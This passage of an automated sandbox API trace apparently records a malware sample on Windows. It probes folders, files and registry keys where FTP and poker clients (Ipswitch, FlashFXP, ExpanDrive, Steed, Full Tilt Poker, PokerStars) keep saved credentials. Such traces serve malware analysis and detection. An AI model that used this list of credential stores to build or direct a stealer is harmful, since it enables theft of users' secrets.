returned 0 [0128.807] GetProcessHeap () returned 0x6a0000 [0128.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7a80 | out: hHeap=0x6a0000) returned 1 [0128.807] GetProcessHeap () returned 0x6a0000 [0128.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.807] GetProcessHeap () returned 0x6a0000 [0128.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.820] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.820] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0128.820] GetProcessHeap () returned 0x6a0000 [0128.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f56) returned 0x6bb458 [0128.821] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.822] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Ipswitch", arglist=0x19fb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 46 [0128.822] GetProcessHeap () returned 0x6a0000 [0128.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x6b9518 [0128.822] GetProcessHeap () returned 0x6a0000 [0128.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.825] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 0 [0128.825] GetProcessHeap () returned 0x6a0000 [0128.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.825] GetProcessHeap () returned 0x6a0000 [0128.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.826] GetProcessHeap () returned 0x6a0000 [0128.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.827] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.827] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0128.827] GetProcessHeap () returned 0x6a0000 [0128.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f56) returned 0x6bb458 [0128.828] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.829] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\site.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 30 [0128.829] GetProcessHeap () returned 0x6a0000 [0128.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4b08 [0128.829] GetProcessHeap () returned 0x6a0000 [0128.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.831] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 0 [0128.831] GetProcessHeap () returned 0x6a0000 [0128.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4b08 | out: hHeap=0x6a0000) returned 1 [0128.831] GetProcessHeap () returned 0x6a0000 [0128.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.850] GetProcessHeap () returned 0x6a0000 [0128.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0128.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.852] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software", phkResult=0x6ba9c0 | out: phkResult=0x6ba9c0*=0x210) returned 0x0 [0128.852] GetProcessHeap () returned 0x6a0000 [0128.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bac30 [0128.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.853] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x0, pszName=0x6bac30, pcchName=0x19fb90 | out: pszName="AppDataLow", pcchName=0x19fb90) returned 0x0 [0128.854] GetProcessHeap () returned 0x6a0000 [0128.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0128.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.857] RegOpenKeyW (in: hKey=0x210, lpSubKey="AppDataLow", phkResult=0x6baa20 | out: phkResult=0x6baa20*=0x204) returned 0x0 [0128.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.859] StrStrW (lpFirst="AppDataLow", lpSrch="Full Tilt Poker") returned 0x0 [0128.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.861] RegCloseKey (hKey=0x204) returned 0x0 [0128.861] GetProcessHeap () returned 0x6a0000 [0128.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0128.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.862] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x1, pszName=0x6bac30, pcchName=0x19fb90 | out: pszName="IM Providers", pcchName=0x19fb90) returned 0x0 [0128.863] GetProcessHeap () returned 0x6a0000 [0128.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0128.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.865] RegOpenKeyW (in: hKey=0x210, lpSubKey="IM Providers", phkResult=0x6baaa0 | out: phkResult=0x6baaa0*=0x204) returned 0x0 [0128.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.867] StrStrW (lpFirst="IM Providers", lpSrch="Full Tilt Poker") returned 0x0 [0128.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.868] RegCloseKey (hKey=0x204) returned 0x0 [0128.868] GetProcessHeap () returned 0x6a0000 [0128.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0128.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.870] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x2, pszName=0x6bac30, pcchName=0x19fb90 | out: pszName="Microsoft", pcchName=0x19fb90) returned 0x0 [0128.870] GetProcessHeap () returned 0x6a0000 [0128.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0128.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.871] RegOpenKeyW (in: hKey=0x210, lpSubKey="Microsoft", phkResult=0x6ba9d0 | out: phkResult=0x6ba9d0*=0x204) returned 0x0 [0128.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.873] StrStrW (lpFirst="Microsoft", lpSrch="Full Tilt Poker") returned 0x0 [0128.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.874] RegCloseKey (hKey=0x204) returned 0x0 [0128.874] GetProcessHeap () returned 0x6a0000 [0128.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0128.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.875] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x3, pszName=0x6bac30, pcchName=0x19fb90 | out: pszName="Netscape", pcchName=0x19fb90) returned 0x0 [0128.875] GetProcessHeap () returned 0x6a0000 [0128.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0128.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.877] RegOpenKeyW (in: hKey=0x210, lpSubKey="Netscape", phkResult=0x6bab40 | out: phkResult=0x6bab40*=0x204) returned 0x0 [0128.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.879] StrStrW (lpFirst="Netscape", lpSrch="Full Tilt Poker") returned 0x0 [0128.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.882] RegCloseKey (hKey=0x204) returned 0x0 [0128.882] GetProcessHeap () returned 0x6a0000 [0128.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0128.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.884] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x4, pszName=0x6bac30, pcchName=0x19fb90 | out: pszName="ODBC", pcchName=0x19fb90) returned 0x0 [0128.884] GetProcessHeap () returned 0x6a0000 [0128.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0128.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.886] RegOpenKeyW (in: hKey=0x210, lpSubKey="ODBC", phkResult=0x6baab0 | out: phkResult=0x6baab0*=0x204) returned 0x0 [0128.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.887] StrStrW (lpFirst="ODBC", lpSrch="Full Tilt Poker") returned 0x0 [0128.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.888] RegCloseKey (hKey=0x204) returned 0x0 [0128.888] GetProcessHeap () returned 0x6a0000 [0128.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0128.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.889] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x5, pszName=0x6bac30, pcchName=0x19fb90 | out: pszName="Policies", pcchName=0x19fb90) returned 0x0 [0128.890] GetProcessHeap () returned 0x6a0000 [0128.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0128.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.892] RegOpenKeyW (in: hKey=0x210, lpSubKey="Policies", phkResult=0x6ba970 | out: phkResult=0x6ba970*=0x204) returned 0x0 [0128.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.893] StrStrW (lpFirst="Policies", lpSrch="Full Tilt Poker") returned 0x0 [0128.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.895] RegCloseKey (hKey=0x204) returned 0x0 [0128.895] GetProcessHeap () returned 0x6a0000 [0128.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0128.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.896] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x6, pszName=0x6bac30, pcchName=0x19fb90 | out: pszName="RegisteredApplications", pcchName=0x19fb90) returned 0x0 [0128.896] GetProcessHeap () returned 0x6a0000 [0128.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0128.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.905] RegOpenKeyW (in: hKey=0x210, lpSubKey="RegisteredApplications", phkResult=0x6ba9f0 | out: phkResult=0x6ba9f0*=0x204) returned 0x0 [0128.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.907] StrStrW (lpFirst="RegisteredApplications", lpSrch="Full Tilt Poker") returned 0x0 [0128.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.908] RegCloseKey (hKey=0x204) returned 0x0 [0128.908] GetProcessHeap () returned 0x6a0000 [0128.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0128.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.909] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x7, pszName=0x6bac30, pcchName=0x19fb90 | out: pszName="Wow6432Node", pcchName=0x19fb90) returned 0x0 [0128.909] GetProcessHeap () returned 0x6a0000 [0128.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0128.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.911] RegOpenKeyW (in: hKey=0x210, lpSubKey="Wow6432Node", phkResult=0x6ba9e0 | out: phkResult=0x6ba9e0*=0x204) returned 0x0 [0128.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.913] StrStrW (lpFirst="Wow6432Node", lpSrch="Full Tilt Poker") returned 0x0 [0128.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.914] RegCloseKey (hKey=0x204) returned 0x0 [0128.914] GetProcessHeap () returned 0x6a0000 [0128.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0128.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.916] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x8, pszName=0x6bac30, pcchName=0x19fb90 | out: pszName="Classes", pcchName=0x19fb90) returned 0x0 [0128.916] GetProcessHeap () returned 0x6a0000 [0128.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0128.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.917] RegOpenKeyW (in: hKey=0x210, lpSubKey="Classes", phkResult=0x6baa00 | out: phkResult=0x6baa00*=0x204) returned 0x0 [0128.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.919] StrStrW (lpFirst="Classes", lpSrch="Full Tilt Poker") returned 0x0 [0128.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.920] RegCloseKey (hKey=0x204) returned 0x0 [0128.920] GetProcessHeap () returned 0x6a0000 [0128.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0128.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.922] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x9, pszName=0x6bac30, pcchName=0x19fb90 | out: pszName="", pcchName=0x19fb90) returned 0x103 [0128.922] GetProcessHeap () returned 0x6a0000 [0128.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0128.924] RegCloseKey (hKey=0x210) returned 0x0 [0128.924] GetProcessHeap () returned 0x6a0000 [0128.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0128.924] GetProcessHeap () returned 0x6a0000 [0128.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.925] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.925] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0128.927] Sleep (dwMilliseconds=0xa) [0128.946] GetProcessHeap () returned 0x6a0000 [0128.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bb458 [0128.947] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.948] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s", arglist=0x19f920 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*") returned 47 [0128.948] GetProcessHeap () returned 0x6a0000 [0128.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x62) returned 0x6b9518 [0128.948] GetProcessHeap () returned 0x6a0000 [0128.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.949] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\pokerstars*"), lpFindFileData=0x19f934 | out: lpFindFileData=0x19f934*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x6, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x6b9518, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x6a6b60, nFileSizeHigh=0x0, nFileSizeLow=0x11, dwReserved0=0x1010000, dwReserved1=0x11, cFileName="\x11", cAlternateFileName="ᕿ酰ﮝ⬤")) returned 0xffffffff [0128.950] GetProcessHeap () returned 0x6a0000 [0128.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.950] GetProcessHeap () returned 0x6a0000 [0128.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.951] GetProcessHeap () returned 0x6a0000 [0128.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bac30 [0128.951] GetProcessHeap () returned 0x6a0000 [0128.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab460 [0128.951] GetProcessHeap () returned 0x6a0000 [0128.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bb458 [0128.952] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.952] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6bb458 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0128.952] GetProcessHeap () returned 0x6a0000 [0128.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5a) returned 0x6bb668 [0128.953] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.954] wvsprintfW (in: param_1=0x6bb668, param_2="%s\\ExpanDrive", arglist=0x19fb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0128.954] GetProcessHeap () returned 0x6a0000 [0128.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x6b9518 [0128.955] GetProcessHeap () returned 0x6a0000 [0128.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb668 | out: hHeap=0x6a0000) returned 1 [0128.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.956] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0128.956] GetProcessHeap () returned 0x6a0000 [0128.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.957] GetProcessHeap () returned 0x6a0000 [0128.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.957] GetProcessHeap () returned 0x6a0000 [0128.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bb458 [0128.958] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.958] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6bb458 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0128.958] GetProcessHeap () returned 0x6a0000 [0128.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5a) returned 0x6bb668 [0128.959] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.966] wvsprintfW (in: param_1=0x6bb668, param_2="%s\\ExpanDrive", arglist=0x19fb6c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0128.966] GetProcessHeap () returned 0x6a0000 [0128.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x6b9518 [0128.966] GetProcessHeap () returned 0x6a0000 [0128.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb668 | out: hHeap=0x6a0000) returned 1 [0128.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.967] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0128.968] GetProcessHeap () returned 0x6a0000 [0128.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.968] GetProcessHeap () returned 0x6a0000 [0128.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.969] GetProcessHeap () returned 0x6a0000 [0128.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.969] GetProcessHeap () returned 0x6a0000 [0128.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x6a0000) returned 1 [0128.969] GetProcessHeap () returned 0x6a0000 [0128.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6c) returned 0x6bb458 [0128.970] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.971] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Steed\\bookmarks.txt", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 57 [0128.971] GetProcessHeap () returned 0x6a0000 [0128.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x6b86e0 [0128.971] GetProcessHeap () returned 0x6a0000 [0128.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.973] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 0 [0128.974] GetProcessHeap () returned 0x6a0000 [0128.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b86e0 | out: hHeap=0x6a0000) returned 1 [0128.974] GetProcessHeap () returned 0x6a0000 [0128.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x400) returned 0x6bac30 [0128.974] GetProcessHeap () returned 0x6a0000 [0128.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab3d0 [0128.975] GetProcessHeap () returned 0x6a0000 [0128.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bb458 [0128.975] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.976] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bb458 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0128.976] GetProcessHeap () returned 0x6a0000 [0128.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f56) returned 0x6bb668 [0128.977] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.977] wvsprintfW (in: param_1=0x6bb668, param_2="%s\\FlashFXP", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0128.977] GetProcessHeap () returned 0x6a0000 [0128.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x6b9518 [0128.978] GetProcessHeap () returned 0x6a0000 [0128.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb668 | out: hHeap=0x6a0000) returned 1 [0128.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.979] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0128.979] GetProcessHeap () returned 0x6a0000 [0128.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.980] GetProcessHeap () returned 0x6a0000 [0128.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.980] GetProcessHeap () returned 0x6a0000 [0128.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bb458 [0128.981] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.982] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bb458 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0128.982] GetProcessHeap () returned 0x6a0000 [0128.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f56) returned 0x6bb668 [0128.986] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.986] wvsprintfW (in: param_1=0x6bb668, param_2="%s\\FlashFXP", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0128.986] GetProcessHeap () returned 0x6a0000 [0128.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x6b9518 [0128.987] GetProcessHeap () returned 0x6a0000 [0128.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb668 | out: hHeap=0x6a0000) returned 1 [0128.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.989] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0128.989] GetProcessHeap () returned 0x6a0000 [0128.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.990] GetProcessHeap () returned 0x6a0000 [0128.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.990] GetProcessHeap () returned 0x6a0000 [0128.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bb458 [0128.991] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.992] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x6bb458 | out: pszPath="C:\\ProgramData") returned 0x0 [0128.993] GetProcessHeap () returned 0x6a0000 [0128.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f56) returned 0x6bb668 [0128.994] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.995] wvsprintfW (in: param_1=0x6bb668, param_2="%s\\FlashFXP", arglist=0x19fb58 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0128.995] GetProcessHeap () returned 0x6a0000 [0128.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x32) returned 0x6ad6a0 [0128.995] GetProcessHeap () returned 0x6a0000 [0128.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb668 | out: hHeap=0x6a0000) returned 1 [0128.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.997] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0128.998] GetProcessHeap () returned 0x6a0000 [0128.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.999] GetProcessHeap () returned 0x6a0000 [0128.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ad6a0 | out: hHeap=0x6a0000) returned 1 [0129.000] GetProcessHeap () returned 0x6a0000 [0129.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bb458 [0129.001] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.002] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x6bb458 | out: pszPath="C:\\ProgramData") returned 0x0 [0129.002] GetProcessHeap () returned 0x6a0000 [0129.002] RtlAllocateHeap (HeapHandle=0x6a0000, 